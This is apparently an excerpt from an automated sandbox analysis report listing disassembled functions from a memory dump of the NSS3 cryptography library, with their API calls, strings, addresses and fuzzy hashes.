Part of subcall function 68D795C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,68D57F4A,00000000,?,00000000,00000000), ref: 68D795F5
Part of subcall function 68D795C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 68D79609
Part of subcall function 68D795C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 68D7961D
Part of subcall function 68D795C0: PK11_GetInternalSlot.NSS3 ref: 68D7970B
Part of subcall function 68D795C0: PK11_FreeSymKey.NSS3(00000000), ref: 68D79756
Part of subcall function 68D795C0: PK11_GetIVLength.NSS3(?), ref: 68D79767
Part of subcall function 68D795C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 68D7977E
Part of subcall function 68D795C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 68D7978E

Strings

@uU~/, xrefs: 68DA0C6F

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: @uU~/
API String ID: 3136566230-2989128320
Opcode ID: d49ee056178db171cb04f06b75ad8d3a80ed2b50a15e16b74a96e582603e77b5
Instruction ID: 4b387162774f31555fe7f6ca189593437d8ffd970d7bace83f3a5911d83f3611
Opcode Fuzzy Hash: d49ee056178db171cb04f06b75ad8d3a80ed2b50a15e16b74a96e582603e77b5
Instruction Fuzzy Hash: 7A41B0B6900205EBEF009F65EC85BBF7674AF053D8F904024E92967241E775EA54CBF2

Uniqueness

Uniqueness Score: -1.00%

Function 68E4C8A0 Relevance: 21.1, APIs: 14, Instructions: 94stringCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000020), ref: 68E4C8B9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 68E4C8DA
malloc.MOZGLUE(00000001), ref: 68E4C8E4
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 68E4C8F8
PR_NewLock.NSS3 ref: 68E4C909
PR_NewCondVar.NSS3(00000000), ref: 68E4C918
PR_NewCondVar.NSS3(00000000), ref: 68E4C92A

Part of subcall function 68D20F00: PR_GetPageSize.NSS3(68D20936,FFFFE8AE,?,68CB16B7,00000000,?,68D20936,00000000,?,68CB204A), ref: 68D20F1B
Part of subcall function 68D20F00: PR_NewLogModule.NSS3(clock,68D20936,FFFFE8AE,?,68CB16B7,00000000,?,68D20936,00000000,?,68CB204A), ref: 68D20F25

free.MOZGLUE(00000000), ref: 68E4C947

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
String ID:
API String ID: 2931242645-0
Opcode ID: 7cf1030768e123e2b925f6b425a1e5ba536e6de39813916895308df9b281795e
Instruction ID: 57fbe67808f5a78eae392c99f87386bc3465cdda89ce4a6a04fea7e37acf6c24
Opcode Fuzzy Hash: 7cf1030768e123e2b925f6b425a1e5ba536e6de39813916895308df9b281795e
Instruction Fuzzy Hash: 7A21DCF2B00701ABDB109F79BC4556F76A8AF07258F540539E96EC3740E731D519CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 68D2ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 68D2ACE2
malloc.MOZGLUE(00000001), ref: 68D2ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 68D2AD02
TlsGetValue.KERNEL32 ref: 68D2AD3C
calloc.MOZGLUE(00000001,?), ref: 68D2AD8C
PR_Unlock.NSS3 ref: 68D2ADC0
free.MOZGLUE(00000000), ref: 68D2AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 68D2AE58
free.MOZGLUE(00000000), ref: 68D2AE69
free.MOZGLUE(?), ref: 68D2AE78
PR_Unlock.NSS3 ref: 68D2AE8C
free.MOZGLUE(?), ref: 68D2AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 68D2AEC7

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: fefab1cb6910810d73ae51fdb1ff8c19a7ff4615f56465bf415c71a89c7c6ea6
Instruction ID: 1835ed7e50b09a0422b952e5df01f724d309dc25dbd578a2f33e7651b6be1278
Opcode Fuzzy Hash: fefab1cb6910810d73ae51fdb1ff8c19a7ff4615f56465bf415c71a89c7c6ea6
Instruction Fuzzy Hash: 7051E1B5E00216DBDF01CF94D89566E7778FB07388F840626DA29B3241E375A905CBF2

Uniqueness

Uniqueness Score: -1.00%

Function 68E04C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 68E04CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 68E04CFD
sqlite3_value_text16.NSS3(?), ref: 68E04D44

Strings

abort due to ROLLBACK, xrefs: 68E04D27, 68E04D33
unknown error, xrefs: 68E04D56
invalid, xrefs: 68E04CF1
another row available, xrefs: 68E04D20
bad parameter or other API misuse, xrefs: 68E04D05
API call with %s database connection pointer, xrefs: 68E04CF6
out of memory, xrefs: 68E04C78, 68E04C9E
no more rows available, xrefs: 68E04D2E

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: d8790a95fc846e1354aa794cba7d3e358c33d61f4a244b12b0b25b6da0795a9c
Instruction ID: 2a52d63f6810ab23928d7d18cffe21fa5309bfbf60dfe2275f19089a66a0784f
Opcode Fuzzy Hash: d8790a95fc846e1354aa794cba7d3e358c33d61f4a244b12b0b25b6da0795a9c
Instruction Fuzzy Hash: 283158B3E84855B7EB34462CAA407A8736167A331DFF5086BD83447354C735A87283E3

Uniqueness

Uniqueness Score: -1.00%

Function 68D66C40 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 68D66C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 68D66C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 68D66CA3

Part of subcall function 68E4D930: PL_strncpyz.NSS3(?,?,?), ref: 68E4D963

PR_LogPrint.NSS3(?,00000000), ref: 68D66CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 68D66CD5

Strings

(CK_INVALID_HANDLE), xrefs: 68D66C9C
pMechanism = 0x%p, xrefs: 68D66CD0
hSession = 0x%x, xrefs: 68D66C7E, 68D66C8E
@uU~/, xrefs: 68D66C4C
nh, xrefs: 68D66CF4, 68D66D1F
C_DigestInit, xrefs: 68D66C61

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$@uU~/$C_DigestInit$nh
API String ID: 1003633598-3339023202
Opcode ID: 62e80a68dc0b931e93f9819fb303ce852b635affa184b42b6de862507c036f7d
Instruction ID: 5fb252454141713cc9af30d12f77c1f2943c75acf0a2fb7544a9bddb2a87ff2f
Opcode Fuzzy Hash: 62e80a68dc0b931e93f9819fb303ce852b635affa184b42b6de862507c036f7d
Instruction Fuzzy Hash: 53212D399401189FDF009B15FD84F6E3BA5DF873A8FC5402AE61D97201DB709994CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 68D7ECE0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,68D7DE64), ref: 68D7ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 68D7ED22

Part of subcall function 68D8B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,68E618D0,?), ref: 68D8B095

PL_FreeArenaPool.NSS3(?), ref: 68D7ED4A
PL_FinishArenaPool.NSS3(?), ref: 68D7ED6B
PR_CallOnce.NSS3(68E92AA4,68D912D0), ref: 68D7ED38

Part of subcall function 68CB4C70: TlsGetValue.KERNEL32(?,?,?,68CB3921,68E914E4,68DFCC70), ref: 68CB4C97
Part of subcall function 68CB4C70: EnterCriticalSection.KERNEL32(?,?,?,?,68CB3921,68E914E4,68DFCC70), ref: 68CB4CB0
Part of subcall function 68CB4C70: PR_Unlock.NSS3(?,?,?,?,?,68CB3921,68E914E4,68DFCC70), ref: 68CB4CC9

SECOID_FindOID_Util.NSS3(?), ref: 68D7ED52
PR_CallOnce.NSS3(68E92AA4,68D912D0), ref: 68D7ED83
PL_FreeArenaPool.NSS3(?), ref: 68D7ED95
PL_FinishArenaPool.NSS3(?), ref: 68D7ED9D

Part of subcall function 68D964F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,68D9127C,00000000,00000000,00000000), ref: 68D9650E

Strings

security, xrefs: 68D7ED06
@uU~/, xrefs: 68D7ECEB

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: @uU~/$security
API String ID: 3323615905-4272395282
Opcode ID: 8e5bc48987320e56243612841f9d0414953e2dbf4d2650b075cba2b8492ef1a2
Instruction ID: aeb79bb9e80a751c6d4bb6fc5482023cea53e87844f24cf4df2d1fd5c5e32fe6
Opcode Fuzzy Hash: 8e5bc48987320e56243612841f9d0414953e2dbf4d2650b075cba2b8492ef1a2
Instruction Fuzzy Hash: CC115C7A940214ABEF205776BC41FBF7268AF12BDCFC00535E86422181F765A909C6F7

Uniqueness

Uniqueness Score: -1.00%

Function 68D62CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 68D62CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 68D62D07

Part of subcall function 68E409D0: PR_Now.NSS3 ref: 68E40A22
Part of subcall function 68E409D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 68E40A35
Part of subcall function 68E409D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 68E40A66
Part of subcall function 68E409D0: PR_GetCurrentThread.NSS3 ref: 68E40A70
Part of subcall function 68E409D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 68E40A9D
Part of subcall function 68E409D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 68E40AC8
Part of subcall function 68E409D0: PR_vsmprintf.NSS3(?,?), ref: 68E40AE8
Part of subcall function 68E409D0: EnterCriticalSection.KERNEL32(?), ref: 68E40B19
Part of subcall function 68E409D0: OutputDebugStringA.KERNEL32(00000000), ref: 68E40B48
Part of subcall function 68E409D0: _PR_MD_UNLOCK.NSS3(?), ref: 68E40C76
Part of subcall function 68E409D0: PR_LogFlush.NSS3 ref: 68E40C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 68D62D22

Part of subcall function 68E409D0: OutputDebugStringA.KERNEL32(?), ref: 68E40B88
Part of subcall function 68E409D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 68E40C5D
Part of subcall function 68E409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 68E40C8D
Part of subcall function 68E409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 68E40C9C
Part of subcall function 68E409D0: OutputDebugStringA.KERNEL32(?), ref: 68E40CD1
Part of subcall function 68E409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 68E40CEC
Part of subcall function 68E409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 68E40CFB
Part of subcall function 68E409D0: OutputDebugStringA.KERNEL32(00000000), ref: 68E40D16
Part of subcall function 68E409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 68E40D26
Part of subcall function 68E409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 68E40D35
Part of subcall function 68E409D0: OutputDebugStringA.KERNEL32(0000000A), ref: 68E40D65
Part of subcall function 68E409D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 68E40D70
Part of subcall function 68E409D0: _PR_MD_UNLOCK.NSS3(?), ref: 68E40D90
Part of subcall function 68E409D0: free.MOZGLUE(00000000), ref: 68E40D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 68D62D3B

Part of subcall function 68E409D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 68E40BAB
Part of subcall function 68E409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 68E40BBA
Part of subcall function 68E409D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 68E40D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 68D62D54

Part of subcall function 68E409D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 68E40BCB
Part of subcall function 68E409D0: EnterCriticalSection.KERNEL32(?), ref: 68E40BDE
Part of subcall function 68E409D0: OutputDebugStringA.KERNEL32(?), ref: 68E40C16

Strings

C_InitToken, xrefs: 68D62CE7
pLabel = 0x%p, xrefs: 68D62D4F
slotID = 0x%x, xrefs: 68D62D02
ulPinLen = %d, xrefs: 68D62D36
pPin = 0x%p, xrefs: 68D62D1D
nh, xrefs: 68D62D6C, 68D62D9A

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nh
API String ID: 420000887-3237639983
Opcode ID: 5f3bc32c564c7cb3075227a5b4dfd2166f9c6dee4e1432974f6cf9d53a36a28b
Instruction ID: d4876c0005e2c652b2b0f53751a1a62d5d270bcd318772736f52c8c1d90a3694
Opcode Fuzzy Hash: 5f3bc32c564c7cb3075227a5b4dfd2166f9c6dee4e1432974f6cf9d53a36a28b
Instruction Fuzzy Hash: B221D87A540104EFDF009B54EC84A5D3BA6EB9B36DFC44066E61897162DBF08895CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 68D34880 Relevance: 18.2, APIs: 12, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 68D348A2
PORT_NewArena_Util.NSS3(00000800), ref: 68D348C4
PORT_ArenaAlloc_Util.NSS3(?,000000BC), ref: 68D348D8
memset.VCRUNTIME140(00000004,00000000,000000B8), ref: 68D348FB
PORT_ArenaAlloc_Util.NSS3(?,00000018), ref: 68D34908
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 68D34947
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 68D3496C
PR_SetError.NSS3(FFFFE013,00000000), ref: 68D34988
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,68E58DAC,?), ref: 68D349DE
PR_SetError.NSS3(FFFFE005,00000000), ref: 68D349FD
PORT_FreeArena_Util.NSS3(?,00000000), ref: 68D34ACB

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Util$Alloc_ArenaError$Arena_Item_$CopyDecodeFreeQuickmemset
String ID:
API String ID: 4201528089-0
Opcode ID: 98f94e998b86c255deab552bde5151b8c260deb88adb626bfd412d6288e96208
Instruction ID: 4eaf4a130ae98d56b91cd7f2d1db779369f97b6e42c5b84c3a6b1d5481189dd3
Opcode Fuzzy Hash: 98f94e998b86c255deab552bde5151b8c260deb88adb626bfd412d6288e96208
Instruction Fuzzy Hash: 8951F871A00331DBEB308F65EC4176B76E6AF6238CF804028D9699A391E77BD4108776

Uniqueness

Uniqueness Score: -1.00%

Function 68CB4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,68CB3921,68E914E4,68DFCC70), ref: 68CB4C97
EnterCriticalSection.KERNEL32(?,?,?,?,68CB3921,68E914E4,68DFCC70), ref: 68CB4CB0
PR_Unlock.NSS3(?,?,?,?,?,68CB3921,68E914E4,68DFCC70), ref: 68CB4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,68CB3921,68E914E4,68DFCC70), ref: 68CB4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,68CB3921,68E914E4,68DFCC70), ref: 68CB4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,68CB3921,68E914E4,68DFCC70), ref: 68CB4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,68CB3921,68E914E4,68DFCC70), ref: 68CB4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,68CB3921,68E914E4,68DFCC70), ref: 68CB4D97
PR_Lock.NSS3(?,?,?,?,?,68CB3921,68E914E4,68DFCC70), ref: 68CB4DBA
PR_WaitCondVar.NSS3 ref: 68CB4DD4
PR_Unlock.NSS3(?,?,?,?,?,68CB3921,68E914E4,68DFCC70), ref: 68CB4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,68CB3921,68E914E4,68DFCC70), ref: 68CB4DEF

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 51a2fcb04d1f31e318add035c8863c06d234969b4b9ab9aa20f5c0cc924ffa92
Instruction ID: 36e416ff002070ab14fd4261fce0f15ac14638a76e08f3b34b4098d5c2c6879b
Opcode Fuzzy Hash: 51a2fcb04d1f31e318add035c8863c06d234969b4b9ab9aa20f5c0cc924ffa92
Instruction Fuzzy Hash: 4F417CB8908B55CFCF11AFB9D48852DB7B4BF06354F45466AD8A89B301E730D881CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 68D7CC70 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 68D7CD08
PK11_DoesMechanism.NSS3(?,?), ref: 68D7CE16
PR_SetError.NSS3(00000000,00000000), ref: 68D7D079

Part of subcall function 68DDC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 68DDC2BF

Strings

@uU~/, xrefs: 68D7CC82

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID: @uU~/
API String ID: 1351604052-2989128320
Opcode ID: 501e2a6929dd863f4767d86a791f30c085e9866bcb5511a221658833e5263e1c
Instruction ID: 8aeae770b9eb6fc57a07a190df58f3cd7836c34f4c039754535049dc6a8370e6
Opcode Fuzzy Hash: 501e2a6929dd863f4767d86a791f30c085e9866bcb5511a221658833e5263e1c
Instruction Fuzzy Hash: 54C1BEB5900219DFDB20CF24DC80BDAB7B4BB49358F9441A8E85CA7241E771EE95CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 68D70C90 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,68D71444,?,00000001,?,00000000,00000000,?,?,68D71444,?,?,00000000,?,?), ref: 68D70CB3

Part of subcall function 68DDC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 68DDC2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,68D71444,?,00000001,?,00000000,00000000,?,?,68D71444,?), ref: 68D70DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,68D71444,?,00000001,?,00000000,00000000,?,?,68D71444,?), ref: 68D70DEC

Part of subcall function 68D90F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,68D32AF5,?,?,?,?,?,68D30A1B,00000000), ref: 68D90F1A
Part of subcall function 68D90F10: malloc.MOZGLUE(00000001), ref: 68D90F30
Part of subcall function 68D90F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 68D90F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,68D71444,?,00000001,?,00000000,00000000,?), ref: 68D70DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,68D71444,?,00000001,?,00000000), ref: 68D70E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,68D71444,?,00000001,?,00000000,00000000,?), ref: 68D70E53
PR_GetCurrentThread.NSS3(?,?,?,?,68D71444,?,00000001,?,00000000,00000000,?,?,68D71444,?,?,00000000), ref: 68D70E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,68D71444,?,00000001,?,00000000,00000000,?), ref: 68D70E79

Part of subcall function 68D81560: TlsGetValue.KERNEL32(00000000,?,68D50844,?), ref: 68D8157A
Part of subcall function 68D81560: EnterCriticalSection.KERNEL32(?,?,?,68D50844,?), ref: 68D8158F
